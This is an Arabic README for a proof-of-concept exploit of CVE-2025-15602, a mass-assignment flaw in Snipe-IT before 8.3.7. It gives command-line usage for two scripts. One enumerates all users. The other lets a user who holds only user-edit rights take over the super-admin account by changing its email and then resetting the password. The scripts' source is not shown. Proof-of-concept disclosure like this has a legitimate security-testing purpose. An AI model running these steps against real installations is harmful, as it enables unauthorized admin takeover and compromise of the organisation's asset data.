
Snipe-IT < 8.3.7 ثغرة تعيين جماعي تؤدي إلى تصعيد الامتيازات
CVE-2025-15602-PoC هو إثبات مفهوم للثغرة CVE-2025-15602 في Snipe-IT. نص برمجي لسرد جميع المستخدمين ونص برمجي للاستيلاء على حساب مشرف فائق.
مستخدم لديه فقط صلاحية تعديل المستخدمين، يمكنه إساءة استخدامها لسردهم والاستيلاء على حساب المشرف الفائق.
لا تنس تغيير BASE_URL في النص البرمجي ليتوافق مع نسختك من snipe-it.
يسرد جميع المستخدمين من النسخة، للحصول على معرف المشرف الفائق الذي تريد الاستيلاء عليه.
python3 list_users.py --attacker-username your_user --attacker-password your_pass --max-id 100
لا تنس تغيير BASE_URL في النص البرمجي ليتوافق مع نسختك من snipe-it.
يستولي على حساب مشرف فائق عبر التخصيص الجماعي (mass assignment).
مهم: تحتاج إلى الحصول على المعلومات الصحيحة من list_users.py أولاً وإلا لن يعمل. يجب أن يكون id وusername وfirst_name مطابقين تمامًا للحساب الهدف.
python3 exploit_auth.py \
--target-id 1 \
--admin-username admin \
--admin-firstname Admin \
--admin-email [email protected] \
--attacker-username your_user \
--attacker-password your_pass
بعد ذلك يمكنك إعادة تعيين كلمة المرور عبر البريد الإلكتروني الذي قمت بتعيينه.
pip install requests beautifulsoup4